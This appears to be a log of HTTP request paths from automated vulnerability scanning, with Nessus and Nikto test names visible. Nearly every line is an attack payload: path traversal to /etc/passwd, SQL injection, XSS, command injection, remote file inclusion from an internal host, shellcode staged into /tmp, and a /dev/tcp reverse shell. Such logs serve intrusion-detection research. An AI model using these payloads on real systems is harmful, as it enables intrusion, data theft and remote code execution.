/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+02+00+00+00+18+00+00+00+00+00+00+00+00+00+00+00+00+00+00+40+00+00+c0+00++>>ctdn
/aj3pf49c.aspx?
/examples/jsp/cal/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\x00
/m4kkjf8l.pl?
/examples/jsp/num/index.php?op=default&date=200607' union select 1,652029819,1,1,1,1,1,1,1,1--&blogid=1
/b1q8bywu.cfm?
/recordings/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd
/clk;63222941;7163019;d/
/examples/jsp/checkbox/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd
/en-us/account/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd
/javascript/meta.exe
/phpmyadmin/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00
/main.php?stuff="|ping\x09-w\x098000\x09-n\x091\x094.3.2.1|rem\x09
/l4fz1dqw.cfm?
/i686v90l.fts?
/miz4r5hz.pl?
/scripts/prnnucptkixl.shtml
/prescriptive_guide/
/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331919223,1,390336409--
/examples/servlets/servlet/viewpage.php?file=/etc/passwd
/main.php?logout=';rm\x09q35732238\x09#
/h5i6crm3.php3?
/scripts/eezuu7xc7ge3.shtml
/7uz3ok60.fts?
/fo564rei.pl?
/examples/jsp/cal/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd
/en-us/oie504mr.jsp?
/recordings/server.pt?open=space&name=";}
/javascript/spy.exe
/phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1../../../../../../../../../../tmp/writetest1351541121.txt
/help.php?q="\x0duname\x09>q93881688\x09#
/main.php?logout="\x0adel\x09q43175153\x09#
/as_noscript/
/european'no'tosoftwarepatentdirectiveleavesdoorsopentoprotectionofnewideas/
/x2gyorli.php3?
/daddy's little princess/
/d5a5renl.fts?
/v3axg1p8.x?
/inc/formmail.inc.php?script_root=http://192.168.202.118:8080/zz5thkvtmlgl?
//
/b5xdqgz2.jspa?
/help.php?q="\x0auname >q73214822 #
/awstats/awstats.pl?migrate=|echo;/bin/echo -en "\0367\0322\0041\03201\0311qqj\0042j\0007pq\0211\0343" >> /tmp/gjehhrjnrx0;echo|awstats193123.txt
/awstats/awstats.pl?migrate=|echo;/bin/echo -en "vj\0001j\0002\0211\0341j\0001jfx\0133\0315\0200\0222" >> /tmp/yzicxmyifv0;echo|awstats535416.txt
/scripts/cwmail.exe
/nuh3zirz.fts?
/examples/jsp/jsp2/el/lib/dbman_filter.inc.php?lib_path=/etc/passwd\x00
/main.php?stuff=ver\x0b>q86682811&rem\x0b
/javascript/profiling.exe
/main.php?stuff="del\x09q23164795&rem\x09
/j4rdyhw8.kspx?
/scripts/%2e./..%5cwinnt/system32/cmd.exe?/x+/c+copy \winnt\system32\cmd.exe 1ecj.exe
/cgi-915/c32web.exe/changeadminpassword
/src/scripture.php?pageheaderfile=http://192.168.202.118:8080/ghl9il??
/examples/jsp/checkbox/athenareg.php?pass= ;id
/b5xdqgz2.x?
/scripts/index.php?op=default&date=200607' union select 1,597038072,1,1,1,1,1,1,1,1--&blogid=1
/scs86g1p.nsf?
/tuwjta1w.php3?
/aj3pf49c.do?
/javascript/text.exe
/forum-ra_professionnel.asp?n=/....../boot.ini
/modules.php?name=stories_archive&sa=show_month&year=&month=3&month_l=test
/examples/jsp/jsp2/el/backend/classes.php?include_path=../lib/jinzora.js\x00
/archive.php?scriptpath=http://192.168.202.118:8080/zz5thkvtmlgl??
/top.php?stuff="ping\xa0-w\xa07000\xa0-n\xa01\xa01.2.3.4&rem\xa0
/gy23xnjq.mscgi?
/main.php?logout="&ver\x0c>q31768299&rem\x0c
/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/bin/echo+-en+"\0174\0044\0000\0377\0347"+>>+/tmp/welwcbtdbf0;')."]=1
/cgi-perl/r.cgi?file=../../../../../../../../../../etc/passwd
/javascript/more.exe
/nyjgaorz.exe?
/projects/1/repository/annotate?rev=`0<&200-;exec 200<>/dev/tcp/192.168.202.96/16919;sh <&200 >&200 2>&200`
/cgi-bin/index.php?site=../../../../../../../../etc/passwd\x00
/addvip.php?msetstr[\"progsdir\"]=@rfiurl
/examples/jsp/num/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\x00&bn=fm_d1
/index.php?id='union/**/select/**/0,0,1649969852,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/en-us/account/htgrep/file=index.html&hdr=/etc/passwd
/openfile.aspx?file=../../../../../../../../../../boot.ini
/en-us/hipkz026.idc?
/cgi-bin/search.jsp?q=%"
/phpmyadmin/perl.exe?-v
/
/examples/jsp/colors/_head.php?_zb_path=../../../../../../../../../../etc/passwd\x00
/manager/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00|
/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.118:8080/tzhfyzkbomspvm?\x00
/m5103snj.cfc?
/oie504mr.exe?
/scripts/mail.cgi
/iv5vkgam.kspx?
/?
/includes/footer.php?template=../../admin/images/admin_headbg.gif\x00
/n1afe1y6.kspx?
/7dbjwpw6.do?
/main.php?logout='\x0auname >q63177134 #
/examples/jsp/num/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;
/main.php?logout="&ver&rem\x09
/cacti/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&"
/
/examples/jsp/jsp2/el/doc/index.php?s=/etc/passwd\x00
/fcgi-bin/msmmask.exe?mask=/junk334
/search_results.dot?search_query=nessus">/
/javascript/card.exe
/manager/cgiforum.pl?thesection=../../../../../../../../etc/passwd\x00
/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331908736,1948616015 --
/eei78ore.jsp?
/main.php?stuff="&ping\x0b-w\x0b9000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b
/1qwv2p5p.dll?
/h21y8w52.exe?
/javascript/.htaccess.sfish/sfish>'>">
/en-us/dda2qr7j.php3?
/manager/sendtemp.pl?templ=../../../../../etc/passwd
/en-us/oie504mr.htm?
/seventh goddess' day/
/top.php?stuff="\x0ddel q38313114 #
/examples/jsp/colors/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
/using logon scripts figure 21102332757725/
/examples/jsp/jsp2/jspx/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini
/cgi/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/top.php?stuff="&ver&rem\x09
/examples/jsp/checkboxsearch-results.dot?search_query=nessus">/
/wps/wcm/webinterface/login/login.jsp?">
/169okeyj.aspx?
/en-us/account/server.pt?open=space&name=";}
/examples/jsp/jsp2/jspx/remindpasswd
/?
/jujgxwav.cfm?
/9ko6m4c8.x?
/um7xpn15.jsp?
/help.php?q="|ping,-w,10000,-n,1,4.3.2.1|rem,
/default.asp?msg=
//
/examples/servlets/servlet/topic.php?tid='select
/phpmyadmin/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00
/scripte/
/index.php?action=storenew&username=
/3j8echh0.php3?
/rv98iwjp.do?
/script/ident/identification.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?
/examples/jsp/jsp2/jspx/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/g8nu2yy7.cgi?
/qhvu0pdg.html?
/javascript/guestbook.exe
/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919142&lang_crm=../../vtigerservice.php\x00
/javascript/document.rhtml
/fcgi-bin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/main.php?stuff=ver\x0c>q99272474&rem\x0c
/pms.php?action=send&recipient=destinataire&subject=happy&posticon=javascript:alert('vulnerable')&mode=0&message=hello
/help.php?q="&ver\x0c>q93118475&rem\x0c
/javascript/computers.exe
/jnt3f86c.html?
/ydexw8by.aspx?
/..\xc0%qf..\xc0%qf..\xc0%qf..\xc0%qf..\xc0%qf../winnt/system32/cmd.exe?/c+dir+c:\+/og
/help.php?q=";del q25549328 #
/?
/j2kdmfw4.asp?
/xsqln7eb.aspx?
/subscriptions.temp
/scripts/tiki-index.php
/7dbjwpw6.mscgi?
/top.php?stuff="&rm\x09q45798999&rem\x09
/cgi-bin/index.php?name=your account&profile=anyone">
/b1q8bywu.cfc?
/fpnpp5zg.x?
/main.php?stuff="|ping\xa0-w\xa08000\xa0-n\xa01\xa01.2.3.4|rem\xa0
/h21y8w52.pl?
/top.php?stuff=ping;-w;10000;-n;1;4.3.2.1&rem;
/u95h6ymu.cfc?
/pxagj7n7.mscgi?
/javascript/demos.exe
/cgi-bin/gw5/gwweb.exe?get-context&htmlver=aaa
/zroo33l4.x?
/examples/jsp/jsp2/el/calendar_admin.pl?config=|cat /etc/passwd|
/apavxugx.nsf?
/h5sc3gxy.cfc?
/ewc3rz1l.jsp?
/examples/jsp/num/nessus">/
/fnwhrxyd.aspx?
/examples/servlets/servlet/sgdynamo.exe?htname=sgdynamo.exe
/descriptor/
/9kr0ih0v.cfm?
/jw64yq8u.nsf?
..\..\..\..\..\..\..\..\..\..\winnt\win.ini
/rpc/..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c../winnt/system32/cmd.exe?/c+dir+c:\+/og
/javascript/.passwd.shtml
/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
/s7qus4g3.nsf?
/iajtej82.cfc?
/en-us/account/main.cgi?board=free_board&command=down_load&filename=/../../../../../../../../etc/passwd
/examples/jsp/num/bb-hist.sh?histfile=../../../../../etc/passwd
/hrttz9fj.aspx?
/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331923205,4,5
/javascript/domain.exe
/copying/
/examples/jsp/error/search.cgi?..\..\..\..\..\..\winnt\win.ini
/examples/jsp/num/lang/lang.php?lang_path=/etc/passwd\x00
/xlj7h65o.kspx?
/examples/jsp/checkbox/index.php?configfile=../../../../../../../../../etc/passwd
/javascript/artwork.exe
/main.php?logout="del;q16377729&rem;
/d765w06j.php3?
/en-us/odzk29aa.php3?
/ju0u7kfo.cgi?
/examples/jsp/num/add_url.htm?node=
/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1
/recordings/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
/site/' union all select filetoclob('/etc/passwd','server')::html,0 from sysusers where username=user --/.html
/e9rx3ya4.php3?
/examples/jsp/jsp2/el/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//
/n1afe1y6.pl?
/modules.php?name=downloads&d_op=viewdownloaddetails&lid=02&ttitle=
/main.php?logout="&ping;-w;10000;-n;1;1.2.3.4&rem;
/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.118:8080/ghl9il??
/index.php?top_message=<script>alert(document.cookie)</script>
/perlscript/
/xfkun1ku.kspx?
/javascript/signup.exe
/lsoix5h3.aspx?
/examples/servlets/servlet/rot13sj.cgi?/etc/passwd
/82q7ywa8.jspa?
/jackrabbit/search.jsp?q=%"
/scripts/eezuu7xc7ge3.html
/azcrfs8d.do?
/?
/subscriptions.asp
/scripts/nckowqpd4zng.html
/6wb70v0b.jsp?
/main.php?stuff=;uname >q28712723 #
/main.php?logout="&del\xa0q18437972&rem\xa0
/qhvu0pdg.idc?
/main.php?logout="ver >q41454446&rem
/recordings/newsdesk.cgi?t=../../../../../../etc/passwd
/examples/jsp/cal/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/en-us/w4996nr0.php3?
/examples/jsp/jsp2/el/config.php?returnpath=/etc/passwd\x00
/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1331908811
/examples/jsp/num/index.php?cid='
/nyvbv05h.mscgi?
/main.php?stuff=\x0auname\x09>q85159998\x09#
/examples/jsp/num/texis.exe/nessus
/javascript/.passwd.asp
/index.php?op=default&date=200607' union select 1,166144719,1,1,1,1,1,1,1,1--&blogid=1
/disablewindowsscriptinghostwsh/
/main.php?logout="|sleep 10 #
/cgi-bin/bslist.cgi?email=x;ls
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+02+00+00+00+18+00+00+00+00+00+00+00+00+00+00+00+00+00+00+40+00+00+c0+00++>>esbq
/esmozg5d.php?
/javascript/wwwstats.exe
/n1afe1y6.cgi?
/vmi8bb12.jsp?
/main.php?stuff='uname >q94914736 #
/examples/jsp/checkbox/showcat.php?cat=1'
/downloads/pafiledb.php?action=download&id=4?\"<script>alert('vulnerable')</script>\"
/scripts/eezuu7xc7ge3.pl
/examples/jsp/jsp2/el/survey.inc.php?path=/etc/passwd\x00
/ny1b3qq4.nsf?
/javascript/document.meta
/scripts/zq9frlz6fcfp.shtml
/scripts/wx4z4gedhl0l.php
/scripts/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00|
/yver8r9o.jsp?
/xlj7h65o.aspx?
/top.php?stuff=';sleep 8 #
/examples/jsp/jsp2/jspx/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\x00
/examples/jsp/cal/print.php?what=article&id='
/nyvbv05h.html?
/g8nu2yy7.mscgi?
/examples/jsp/jsp2/el/detail.asp?nchannel='1
/cacti/ftp/ftp.pl?dir=../../../../../../etc
/examples/jsp/num/include/sql.php?include_path=/etc/passwd\x00
/main.php?stuff="ping\x09-w\x0911000\x09-n\x091\x091.2.3.4&rem\x09
/b5xdqgz2.nsf?
/main.php?logout=\x0duname\x09>q22282418\x09#
/qb2xy9aw.aspx?
/606wkcop.idc?
/i2n4v4rl.exe?
/mv8wxfy9.cfm?
/vhzmaia2.cfc?
/i686v90l.php?
/default.asp?msg=
/recordings/zpanel.php?page=/etc/passwd\x00
/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331909312',null,null,null,null --
/9ko6m4c8.fts?
/en-us/account/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd
/cgi-bin/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini
/javascript/~root.exe
/en-us/oie504mr.php3?
/javascript/xhtml.exe
/javascript/htpasswd.ppt
/codes-scripts/
/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331923189&lang_crm=../../vtigerservice.php\x00
/scriptpath/footers.php?tinybb_footers=http://192.168.202.118:8080/moclyxlwqyfjnp?
/top.php?stuff=&ver\xa0>q27771129&rem\xa0
/ripley's/
/1r8cfrlf.php3?
/top.php?stuff="del;q63898211&rem;
/examples/jsp/colors/error.php?selected_theme=
/j4drbkil.cfc?
/init.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8??
/phpmyadmin/remindpasswd
/album.php?albumid=1'413976083537
/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331919224,4,5
/examples/jsp/colors/lang/lang.php?lang_path=/etc/passwd\x00
/lsoix5h3.mscgi?
/scripts/about/frmabout.aspx
/citrix/accessplatform/auth/clientscripts/login.js
/scripts/_xuzlr7swn95.html
/hrttz9fj.do?
/s7qus4g3.do?
/scripts/vvh_tajyleqq.asp
/servlets/msgpage?action=badlogin&msg=
/pam_passwdqc/
/examples/jsp/jsp2/jspx/more.php?id=1'
/cacti/help.php?section='qualiteam_xcart_sql_xss.nasl
/mv8wxfy9.jspa?
/examples/jsp/sessions/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/javascript/camel.exe
/main.php?logout='\x0duname\x09>q42114986\x09#
/sturgeon's-law/
/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.118:8080/tzhfyzkbomspvm?\x00
/javascript/solaris.exe
/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://192.168.202.118:8080/tzhfyzkbomspvm?
/en-us/odzk29aa.fts?
/6qbynt4f.htm?
/x2gyorli.jspa?
/scripts/hw3.php?daysonly=0).system(id).(
/scripts/sitemap.xml
/newsarchive.php?path_to_script=http://192.168.202.118:8080/moclyxlwqyfjnp??&cmd=ls
/javascript/lang.exe
/main.php?stuff="&ping,-w,7000,-n,1,4.3.2.1&rem,
/mitch's book1159301465750/
/m2fpztty.jsp?
/fnwhrxyd.php3?
/eg2u8pbv.html?
/help.php?q="ping,-w,8000,-n,1,4.3.2.1&rem,
/examples/jsp/jsp2/jspx/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00
/i7prbs22.dll?
/scripts/check_user_id.php?user_id=
/nyjgaorz.php?
/scripts/links_add_form.asp
/help.php?q=';rm\x09q85144243\x09#
/whycan'tifindajob/
/u95h6ymu.fts?
/subscriptions.tar.gz
/0qhcnefz.exe?
/b1q8bywu.exe?
/xml_scripting/
/ldap/cgi-bin/ldacgi.exe?action=
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+d7+93+ff+d7+95+83+c4+10+58+5a+59+53+55+50+8b+ec+50+57+52+56+6a+06+5a+eb+0e++>>esbq
/examples/jsp/jsp2/jspx/?">
/javascript/page1.exe
/en-us/h5sc3gxy.php?
/main.php?stuff="&del,q93432438&rem,
/scgi-bin/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe
/en-us/7o5qp766.dll?
/help.php?q="ping -w 10000 -n 1 1.2.3.4|rem
/scripts/advsearch_h.asp
/examples/jsp/checkbox/pfdispaly.cgi?../../../../../../etc/passwd
/manager/index.php?user_langue=../../../../../../../../../../etc/passwd
/help.php?q="&ver\xa0>q59981564&rem\xa0
/help.php?q=ping;-w;7000;-n;1;1.2.3.4&rem;
/javascript/htpasswd
/_mem_bin/..\xc0%qf..\xc0%qf..\xc0%qf..\xc0%qf..\xc0%qf../winnt/system32/cmd.exe?/c+dir+c:\+/og
/javascript/crypt.exe
/main.php?logout="ping\x09-w\x0911000\x09-n\x091\x091.2.3.4&rem\x09
/examples/jsp/checkbox/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\x00
/ywaxntrx.dll?
/help.php?q="\x0dsleep 10 #
/nyvbv05h.idc?
/i7prbs22.asp?
/main.php?logout="\x0dsleep 10 #
/en-us/.dll
/recordings/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00
/examples/jsp/cal/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\x00.jpg
/
/o35zot2r.jspa?
/examples/jsp/checkbox/index.php?template=../../../loudblog/custom/config.php\x00
/top.php?stuff="&ping\x09-w\x099000\x09-n\x091\x091.2.3.4&rem\x09
/scripts/vhost.php?action=logout&time=1331918957
/j2kdmfw4.exe?
/phpmyadmin/documentation.html?phpmyadmin=map47fckapd3c2j9d7svslcjakhdm1fs" and sleep(4)="
/ghswfouu.asp?
/examples/jsp/checkbox/include/error/autherror.cfm?errorcode=1&ftvar_linkp=">
/h5i6crm3.x?
/t578vqea.exe?
/manager/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 --
/?
/uc3w3bdi.nsf?
/scripts/index.php?template=../../../loudblog/custom/config.php\x00
/examples/jsp/jsp2/jspx/ion-p.exe?page=../../../../../etc/passwd
/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/fhhqvtjwvv.sh+>+/dev/null+&')."]=1
/iktok2bw.php?
/cgibin/msmmask.exe?mask=/junk334
/top.php?stuff="&ver\x0c>q43992942&rem\x0c
/5o9zq43e.jsp?
/help.php?q=&ver;>q31933452&rem;
/examples/servlets/servlet/include/error/autherror.cfm?errorcode=1&ftvar_linkp=">alert('jaws_xss.nasl');
/cgi-914/cgi-test.exe
/examples/jsp/checkbox/index.php?gadget=glossary&action=view&term=
/examples/jsp/jsp2/jspx/session/login.php?dest=nessus">
/en-us/
/fc9t54l7.fts?
/scripts/2sfdqydfaknx.html
/search.jsp?q=%"
/t3af3tdz.exe?
/officescan/cgi/jdkrqnotify.exe
/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.118:8080/zz5thkvtmlgl??
/help.php?q="|sleep\x097\x09#
/main.php?stuff="|ping,-w,9000,-n,1,1.2.3.4|rem,
/scripts/polls.scr.php?globals[pth][classes]=http://192.168.202.118:8080/zz5thkvtmlgl??
/javascript/tests.exe
/phpmyadmin/newsdesk.cgi?t=../../../../../../etc/passwd
/en-us/account/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd
/scripts/xuicksry9grj.php3
/raanw4ia.dll?
/9kr0ih0v.cfc?
/..\..\..\..\\..\..\\..\..\\\boot.ini
/help.php?q=';uname >q95782248 #
/manager/calendar.php?serverpath=/etc/passwd\x00
/d7ktpmcq.idc?
/en-us/account/sawmill6cl.exe?ho+{complete_version}
/scripts/starnet/addons/slideshow_full.php?album_name='1508239839
/egaet53a.x?
/help.php?q=';uname >q86575497 #
/j4rdyhw8.asp?
/top.php?stuff=|ping;-w;8000;-n;1;4.3.2.1|rem;
/rot13sj.cgi?/etc/passwd
/examples/jsp/num/index.php?show=/etc/passwd
/e9rx3ya4.exe?
/tukodz3j.do?
/scgi-bin/query?mss=../config
/cgis/gw5/gwweb.exe?htmlver=aaa&get-context
/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/txenjrxf3?\x00
/javascript/webcasts.exe
/scripts/bpk_bsfe_4vq.inc
/jw64yq8u.php?
/examples/servlets/servlet/search/show.pl?url=file:/etc/passwd
/en-us/jnv890lt.x?
/?
/subscription/
/ows-bin/query?mss=../config
/main.php?stuff="ping\xa0-w\xa07000\xa0-n\xa01\xa04.3.2.1&rem\xa0
/cgi-bin/search.jsp?q=%"
/help.php?q="ver\xa0>q23773279&rem\xa0
/subscriptionmailsignupssl/
/iktok2bw.mscgi?
/bin/powerup/r.cgi?file=../../../../../../../../../../etc/passwd
/script/param/param.inc.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?
/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010395',null,null,null,null --
/?p4yl04d3=
/agent_affil.pl?login=
/recordings/mylog.html?screen=/etc/passwd
/modules.php?name=web_links&l_op=viewlinkcomments&lid=2pp'/**/union/**/select/**/'412745581503'/*
/zroo33l4.idc?
/javascript/forum.exe
/admin/geo_zones.php?zone=
/javascript/sex.exe
/zipwise field descriptions/
/top.php?stuff="&uname\x09#
/../.dump
/javascript/goaway.exe
/ju0u7kfo.idc?
/cgi-bin/msmmask.exe?mask=/nessus1246303797.asp
/scripts/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@
/6qbynt4f.php3?
/cgi-bin/db4web_c/dbdirnikto//etc/passwd
/manager/source?v=../../../../../../../../../../etc/passwd\x00
/awstats/awstats.pl?migrate=|echo;/./tmp/qkzpkuflrb.sh;echo|awstats916038.txt
/cgi-bin/bb-hist?histfile=../../../../../../../../../../etc/passwd
/speaker-transcripts/
/cgi-bin/index.php?src=1&_common=1&time=1332010405&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00
/help.php?q=&ver,>q51168469&rem,
/help_text_vars.php?pgv_base_directory=../../../../../../../../../../boot.ini\x00
/examples/jsp/jsp2/el/misc/audio.php?recording=../version.inc
/en-us/jnv890lt.mscgi?
/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/no4ghqiguzhst?\x00
/javascript/success.exe
/examples/jsp/cal/mylog.html?screen=/etc/passwd
/phpwebsite/index.php?module=fatcat&fatcat[user]=viewcategory&fatcat_id=1\x00+\">
/examples/jsp/jsp2/jspx/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
/top.php?stuff="\x0drm q75872817 #
/examples/jsp/cal/port.php?proto=tcp'
/javascript/ie.exe
/javascript/daily.exe
/scripts/cxvae_g3rjys.pl
/catalog_products_with_images.php/"><"
/a0imiuf1.asp?
/bmeun223.mscgi?
/cgi-bin/starnet/addons/slideshow_full.php?album_name='226544801
/qhvu0pdg.php?
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+e0+00+8e+81+0b+01+02+19+00+02+00+00+00+04+00+00+00+00+00+00+00+10+00+00++>>ctdn
/it's a daddy thing/
/scripts/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//
/main.php?logout="sleep\x097\x09#
/top.php?stuff="sleep\x098\x09#
/escript_tests/
/scripts/_head.php?_zb_path=../../../../../../../../../../etc/passwd\x00
/javascript/resize.exe
/examples/jsp/jsp2/jspx/a1stats/a1disp3.cgi?/../../../../../../etc/passwd
/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.118:8080/moclyxlwqyfjnp?
/?
/javascript/strut.exe
/t7tm4m0b.fts?
/examples/jsp/sessions/index.cfm?fuseaction=category.display&category_id='
/5qnlm5z2.php?
/vac1l5vm.exe?
/wps/wcm/webinterface/login/login.jsp?">
/en-us/.html
/scripts/axdgpyi2bn6f.cgi
/main.php?stuff='&sleep\x099\x09#
/examples/jsp/jsp2/jspx/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\x00
/scripts/.www_acl
/l752x1ry.cfc?
/jackrabbit/search.jsp?q=%"
/0w155a7c.asp?
/examples/servlets/servlet/remindpasswd
/script56/
/
/top.php?stuff="ping;-w;7000;-n;1;1.2.3.4|rem;
/en-us/s7qus4g3.dll?
/examples/jsp/jsp2/jspx/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00.txt
/cgi-bin/admin/top.php?admindir=/etc/passwd\x00
/certsrv/..%5cwinnt/system32/cmd.exe?/c+dir
/scripts/newsscript.pl?mode=admin
/t7tm4m0b.exe?
/examples/jsp/error/index.php?act=arcade&do=stats&gameid=1'
/6qbynt4f.htm?
/script/tick/test.php?path_to_code=http://192.168.202.118:8080/tzhfyzkbomspvm?
/en-us/account/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
/perl.exe?-v
/help.php?q="&ping;-w;10000;-n;1;1.2.3.4&rem;
/_mem_bin/..\xc1\x1c..\xc1\x1c..\xc1\x1c..\xc1\x1c..\xc1\x1c../winnt/system32/cmd.exe?/c+dir+c:\+/og
/scripts/.%2e/.2e/winnt/system32/cmd.exe?/x+/c+copy \winnt\system32\cmd.exe 3hrgytw.exe
/scripts/1331918962-ror_session_fixation.nasl
/main.php?logout="ping;-w;8000;-n;1;1.2.3.4&rem;
/en-us/hipkz026.fts?
/help.php?q="ver\x0b>q49522765&rem\x0b
/examples/jsp/num/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd
/help.php?q=&rm;q11223182&rem;
/zuihld5m.do?
/d7ktpmcq.asp?
/examples/servlets/servlet/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/oie504mr.dll?
/examples/jsp/jsp2/el/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'
/dslpwt15.dll?
/ydexw8by.aspx?
/wps/wcm/webinterface/login/login.jsp?">
/9ko6m4c8.php?
/b5xdqgz2.htm?
/main.php?logout='\x0auname >q82997141 #
/javascript/document.config
/qb2xy9aw.mscgi?
/phpmyadmin/awstatstotals.php?sort="].passthru('id').exit().$a["
/zuihld5m.cfm?
/nyvbv05h.htm?
/examples/jsp/sessions/lib/dbman_filter.inc.php?lib_path=/etc/passwd\x00
/examples/jsp/sessions/session/login.php?dest=nessus">
/scripts/adlayer.php?layerstyle=../../../../../../../etc/passwd\x00
/examples/jsp/colors/auktion.cgi?menue=../../../../../../../../../etc/passwd
/examples/jsp/cal/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904456','5'--
/manager/edit.jsp?page=user&editor=../../../install
/en-us/accountmultihtml.pl?multi=/etc/passwd\x00html
/ny1b3qq4.kspx?
/h5i6crm3.nsf?
/scripts/index.php?option=frontpage&itemid=2|system(id)|1331904439
/javascript/downloads.exe
/cgi-bin/shopplus.cgi?dn=domainnikto.com&cartid=\xcartid%&file=;cat /etc/passwd|
/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('chmod+777+/tmp/xdfdsfcbur.sh')."]=1
/examples/jsp/error/gadgets/blog/blogmodel.php?path=/etc/passwd\x00
/en-us/account/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id;
/scripts/k0pxpjgnimox.asp
/script//ident/index.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?
/fcgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
/en-us/dda2qr7j.nsf?
/cgibin/fileseek2.cgi?foot=;cat /etc/passwd&head=
/scripts/update.php?op=info
/zmvq66jy.htm?
/examples/jsp/num/javascript.php?abs_path=/etc/passwd\x00
/cgi-bin/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print "content-type: text/plain\x0d\x0a\x0d\x0a";system(id)&action=logout
/xssanatomy/
/main.php?stuff="del;q25586458&rem;
/cgi-bin/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\x00.jpg
/comments.php?scriptpath=http://192.168.202.96:8080/ipb5ri??
/rubyscript2exe/
/o35zot2r.jsp?
/mk - what's next to the moon/
/recordings/cart32.exe
/phpmyadmin/index.php?id=egyb16sayu'
/ny1b3qq4.nsf?
